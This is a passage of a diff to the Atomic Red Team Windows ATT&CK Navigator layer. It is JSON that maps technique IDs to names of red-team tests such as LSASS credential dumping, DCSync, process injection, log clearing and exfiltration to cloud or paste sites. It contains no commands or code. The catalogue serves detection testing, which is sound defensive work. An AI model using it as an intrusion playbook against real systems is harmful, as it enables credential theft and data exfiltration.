$index_allocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"comment":"\n- Register Portable Virtualbox\n- Create and start VirtualBox virtual machine\n- Create and start Hyper-V virtual machine\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"comment":"\n- Download Macro-Enabled Phishing Attachment\n- Word spawned a command shell and used an IP address in the command line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data with rclone to cloud Storage - Mega (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"comment":"\n- Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":5,"enabled":true,"comment":"\n- Execute a Command as a Service\n- Use PsExec to execute a command on a remote host\n- BlackCat pre-encryption cmds with Lateral Movement\n- Use RemCom to execute a command on a remote host\n- Snake Malware Service Create\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"comment":"\n- Exfiltration Over SMB over QUIC (New-SmbMapping)\n- Exfiltration Over SMB over QUIC (NET USE)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"comment":"\n- DNS over HTTPS Large Query Volume\n- DNS over HTTPS Regular Beaconing\n- DNS over HTTPS Long Domain Query\n- run ngrok\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"comment":"\n- OpenSSL C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"comment":"\n- DLL Search Order Hijacking - amsi.dll\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"comment":"\n- DLL Side-Loading using the Notepad++ GUP.exe binary\n- DLL Side-Loading using the dotnet startup hook environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"comment":"\n- powerShell Persistence via hijacking default modules - Get-Variable.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"comment":"\n- Execution of program.exe as service with unquoted service path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"comment":"\n- Service Registry Permissions Weakness\n- Service ImagePath Change with reg.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"comment":"\n- User scope COR_PROFILER\n- System Scope COR_PROFILER\n- Registry-free process scope COR_PROFILER\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"comment":"\n- Enumerate PlugNPlay Camera\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1614","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":2,"enabled":true,"comment":"\n- Discover System Language by Registry Query\n- Discover System Language with chcp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"comment":"\n- Display group policy information via gpresult\n- Get-DomainGPO to display group policy information via PowerView\n- WinPwn - GPOAudit\n- WinPwn - GPORemoteAccessPolicy\n- MSFT Get-GPO Cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"comment":"\n- WinPwn - Reflectively load Mimik@tz into memory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"comment":"\n- Staging Local Certificates via Export-Certificate\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"comment":"\n- Get-EventLog To Enumerate Windows Security Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file +{"name":"Atomic Red Team (Windows)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Windows"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":39,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}],"comment":"\n- Gsecdump\n- Credential Dumping with NPPSpy\n- Dump svchost.exe to gather RDP credentials\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)\n- Dump Credential Manager using keymgr.dll and rundll32.exe\n"},{"techniqueID":"T1003.001","score":14,"enabled":true,"comment":"\n- Dump LSASS.exe Memory using ProcDump\n- Dump LSASS.exe Memory using comsvcs.dll\n- Dump LSASS.exe Memory using direct system calls and API unhooking\n- Dump LSASS.exe Memory using NanoDump\n- Dump LSASS.exe Memory using Windows Task Manager\n- Offline Credential Theft With Mimikatz\n- LSASS read with pypykatz\n- Dump LSASS.exe Memory using Out-Minidump.ps1\n- Create Mini Dump of LSASS.exe using ProcDump\n- Powershell Mimikatz\n- Dump LSASS with createdump.exe from .Net v5\n- Dump LSASS.exe using imported Microsoft DLLs\n- Dump LSASS.exe using lolbin rdrleakdiag.exe\n- Dump LSASS.exe Memory through Silent Process Exit\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"comment":"\n- Registry dump of SAM, creds, and secrets\n- Registry parse with pypykatz\n- esentutl.exe SAM copy\n- PowerDump Hashes and Usernames from Registry\n- dump volume shadow copy hives with certutil\n- dump volume shadow copy hives with System.IO.File\n- WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"comment":"\n- Create Volume Shadow Copy with vssadmin\n- Copy NTDS.dit from Volume Shadow Copy\n- Dump Active Directory Database with NTDSUtil\n- Create Volume Shadow Copy with WMI\n- Create Volume Shadow Copy remotely with WMI\n- Create Volume Shadow Copy remotely (WMI) with esentutl\n- Create Volume Shadow Copy with Powershell\n- Create Symlink to Volume Shadow Copy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"comment":"\n- Dumping LSA Secrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"comment":"\n- Cached Credential Dump via Cmdkey\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"comment":"\n- DCSync (Active Directory)\n- Run DSInternals Get-ADReplAccount\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1005","score":1,"enabled":true,"comment":"\n- Search files of interest and save them to a single zip file (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"comment":"\n- Read volume boot sector via DOS device path (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":2,"enabled":true,"comment":"\n- System Service Discovery\n- System Service Discovery - net.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"comment":"\n- List Process Main Windows - C# .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"comment":"\n- Query Registry\n- Query Registry with Powershell cmdlets\n- Enumerate COM Objects in Registry with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":7,"enabled":true,"comment":"\n- System Network Configuration Discovery on Windows\n- List Windows Firewall Rules\n- System Network Configuration Discovery (TrickBot Style)\n- List Open Egress Ports\n- Adfind - Enumerate Active Directory Subnet Objects\n- Qakbot Recon\n- DNS Server Discovery Using nslookup\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":15,"enabled":true,"comment":"\n- Remote System Discovery - net\n- Remote System Discovery - net group Domain Computers\n- Remote System Discovery - nltest\n- Remote System Discovery - ping sweep\n- Remote System Discovery - arp\n- Remote System Discovery - nslookup\n- Remote System Discovery - adidnsdump\n- Adfind - Enumerate Active Directory Computer Objects\n- Adfind - Enumerate Active Directory Domain Controller Objects\n- Enumerate domain computers within Active Directory using DirectorySearcher\n- Enumerate Active Directory Computers with Get-AdComputer\n- Enumerate Active Directory Computers with ADSISearcher\n- Get-DomainController with PowerView\n- Get-WmiObject to Enumerate Domain Controllers\n- Remote System Discovery - net group Domain Controller\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"comment":"\n- IcedID Botnet HTTP PUT\n- Exfiltration via Encrypted FTP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"comment":"\n- RDP to DomainController\n- Changing RDP Port to Non Standard Port via Powershell\n- Changing RDP Port to Non Standard Port via Command_Prompt\n- Disable NLA for RDP via Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"comment":"\n- Map admin share\n- Map Admin Share PowerShell\n- Copy and Execute File with PsExec\n- Execute command writing output to local Admin Share\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"comment":"\n- PowerShell Lateral Movement using MMC20\n- PowerShell Lateral Movement Using Excel Application Object\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"comment":"\n- Enable Windows Remote Management\n- Remote Code Execution with PS Credentials Using Invoke-Command\n- WinRM Access with Evil-WinRM\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Execute base64-encoded PowerShell\n- Execute base64-encoded PowerShell from Windows Registry\n- Execution from Compressed File\n- DLP Evasion via Sensitive Data in VBA Macro over email\n- DLP Evasion via Sensitive Data in VBA Macro over HTTP\n- Obfuscated Command in PowerShell\n- Obfuscated Command Line using special Unicode characters\n- Snake Malware Encrypted crmlog file\n- Execution from Compressed JScript File\n"},{"techniqueID":"T1027.004","score":2,"enabled":true,"comment":"\n- Compile After Delivery using csc.exe\n- Dynamic C# Compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"comment":"\n- HTML Smuggling Remote Payload\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"comment":"\n- Dynamic API Resolution-Ninja-syscall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"comment":"\n- System Owner/User Discovery\n- Find computers where user has session - Stealth mode (PowerView)\n- User Discovery With Env Vars PowerShell Script\n- GetCurrent User with PowerShell Script\n- System Discovery - SocGholish whoami\n- System Owner/User Discovery Using Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}],"comment":"\n- System File Copied to Unusual Location\n- Malware Masquerading and Execution from Zip File\n"},{"techniqueID":"T1036.003","score":8,"enabled":true,"comment":"\n- Masquerading as Windows LSASS process\n- Masquerading - cscript.exe running as notepad.exe\n- Masquerading - wscript.exe running as svchost.exe\n- Masquerading - powershell.exe running as taskhostw.exe\n- Masquerading - non-windows exe running as windows exe\n- Masquerading - windows exe running as different windows exe\n- Malicious process Masquerading as LSM.exe\n- File Extension Masquerading\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":2,"enabled":true,"comment":"\n- Creating W32Time similar named service using schtasks\n- Creating W32Time similar named service using sc\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Masquerade as a built-in system executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1037","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"comment":"\n- Logon Scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"comment":"\n- Copy a sensitive File over Administrative share with copy\n- Copy a sensitive File over Administrative share with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":5,"enabled":true,"comment":"\n- Packet Capture Windows Command Prompt\n- Windows Internal Packet Capture\n- Windows Internal pktmon capture\n- Windows Internal pktmon set filter\n- PowerShell Network Sniffing\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"comment":"\n- C2 Data Exfiltration\n- Text Based Data Exfiltration using DNS subdomains\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":7,"enabled":true,"comment":"\n- Port Scan NMap for Windows\n- Port Scan using python\n- WinPwn - spoolvulnscan\n- WinPwn - MS17-10\n- WinPwn - bluekeep\n- WinPwn - fruit\n- Port-Scanning /24 Subnet with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"comment":"\n- WMI Reconnaissance Users\n- WMI Reconnaissance Processes\n- WMI Reconnaissance Software\n- WMI Reconnaissance List Remote Services\n- WMI Execute Local Process\n- WMI Execute Remote Process\n- Create a Process using WMI Query and an Encoded Command\n- Create a Process using obfuscated Win32_Process\n- WMI Execute rundll32\n- Application uninstall using WMIC\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- DNSExfiltration (doh)\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":5,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - ICMP\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - SMTP\n- MAZE FTP Upload\n- Exfiltration Over Alternative Protocol - FTP - Rclone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":3,"enabled":true,"comment":"\n- System Network Connections Discovery\n- System Network Connections Discovery with PowerShell\n- System Discovery using SharpView\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At.exe Scheduled task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"comment":"\n- Scheduled Task Startup Script\n- Scheduled task Local\n- Scheduled task Remote\n- Powershell Cmdlet Scheduled Task\n- Task Scheduler via VBA\n- WMI Invoke-CimMethod Scheduled Task\n- Scheduled Task Executing Base64 Encoded Commands From Registry\n- Import XML Schedule Task with Hidden Attribute\n- PowerShell Modify A Scheduled Task\n- Scheduled Task (\"Ghost Task\") via Registry Key Manipulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}],"comment":"\n- Shellcode execution via VBA\n- Remote Process Injection in LSASS via mimikatz\n- Section View Injection\n- Dirty Vanity process Injection\n- Read-Write-Execute process Injection\n- Process Injection with Go using UuidFromStringA WinAPI\n- Process Injection with Go using EtwpCreateEtwThread WinAPI\n- Remote Process Injection with Go using RtlCreateUserThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)\n- Process Injection with Go using CreateThread WinAPI\n- Process Injection with Go using CreateThread WinAPI (Natively)\n- UUID custom process Injection\n"},{"techniqueID":"T1055.001","score":2,"enabled":true,"comment":"\n- Process Injection via mavinject.exe\n- WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"comment":"\n- Portable Executable Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"comment":"\n- Thread Execution Hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"comment":"\n- Process Injection via C#\n- EarlyBird APC Queue Injection in Go\n- Remote Process Injection with Go using NtQueueApcThreadEx WinAPI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"comment":"\n- Process Injection via Extra Window Memory (EWM) x64 executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"comment":"\n- Process Hollowing using PowerShell\n- RunPE via VBA\n- Process Hollowing in Go using CreateProcessW WinAPI\n- Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"comment":"\n- Process injection ListPlanting\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":1,"enabled":true,"comment":"\n- Input Capture\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":1,"enabled":true,"comment":"\n- PowerShell - Prompt User for Password\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"comment":"\n- Hook PowerShell TLS Encrypt/Decrypt Messages\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":5,"enabled":true,"comment":"\n- Process Discovery - tasklist\n- Process Discovery - Get-Process\n- Process Discovery - get-wmiObject\n- Process Discovery - wmic process\n- Discover Specific Process - tasklist\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":31,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":20,"enabled":true,"comment":"\n- Mimikatz\n- Run BloodHound from local disk\n- Run Bloodhound from Memory using Download Cradle\n- Mimikatz - Cradlecraft PsSendKeys\n- Invoke-AppPathBypass\n- Powershell MsXml COM object - with prompt\n- Powershell XML requests\n- Powershell invoke mshta.exe download\n- Powershell Invoke-DownloadCradle\n- PowerShell Fileless Script Execution\n- NTFS Alternate Data Stream Access\n- PowerShell Session Creation and Use\n- ATHPowerShellCommandLineParameter -Command parameter variations\n- ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments\n- PowerShell Command Execution\n- PowerShell Invoke Known Malicious Cmdlets\n- PowerUp Invoke-AllChecks\n- Abuse Nslookup with DNS Records\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"comment":"\n- Create and Execute Batch Script\n- Writes text to a file and displays it.\n- Suspicious Execution via Windows Command Shell\n- Simulate BlackByte Ransomware Print Bombing\n- Command Prompt read contents from CMD file and execute\n- Command prompt writing script to file then executes it\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"comment":"\n- Visual Basic script execution to gather local computer information\n- Encoded VBS code execution\n- Extract Memory via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"comment":"\n- JScript execution to gather local computer information via cscript\n- JScript execution to gather local computer information via wscript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":5,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Local)\n- Permission Groups Discovery PowerShell (Local)\n- SharpHound3 - LocalAdmin\n- Wmic Group Discovery\n- WMIObject Group Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":14,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Domain)\n- Permission Groups Discovery PowerShell (Domain)\n- Elevated group enumeration using net group (Domain)\n- Find machines where user has local admin access (PowerView)\n- Find local admins on all machines in domain (PowerView)\n- Find Local Admins via Group Policy (PowerView)\n- Enumerate Users Not Requiring Pre Auth (ASRepRoast)\n- Adfind - Query Active Directory Groups\n- Enumerate Active Directory Groups with Get-AdGroup\n- Enumerate Active Directory Groups with ADSISearcher\n- Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)\n- Get-DomainGroupMember with PowerView\n- Get-DomainGroup with PowerView\n- Active Directory Enumeration with LDIFDE\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}],"comment":"\n- Indicator Removal using FSUtil\n- Indicator Manipulation using FSUtil\n"},{"techniqueID":"T1070.001","score":3,"enabled":true,"comment":"\n- Clear Logs\n- Delete System Logs Using Clear-EventLog\n- Clear Event Logs via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":3,"enabled":true,"comment":"\n- Prevent Powershell History Logging\n- Clear Powershell History by Deleting History File\n- Set Custom AddToHistoryHandler to Avoid History File Logging\n","links":[{"label":"View 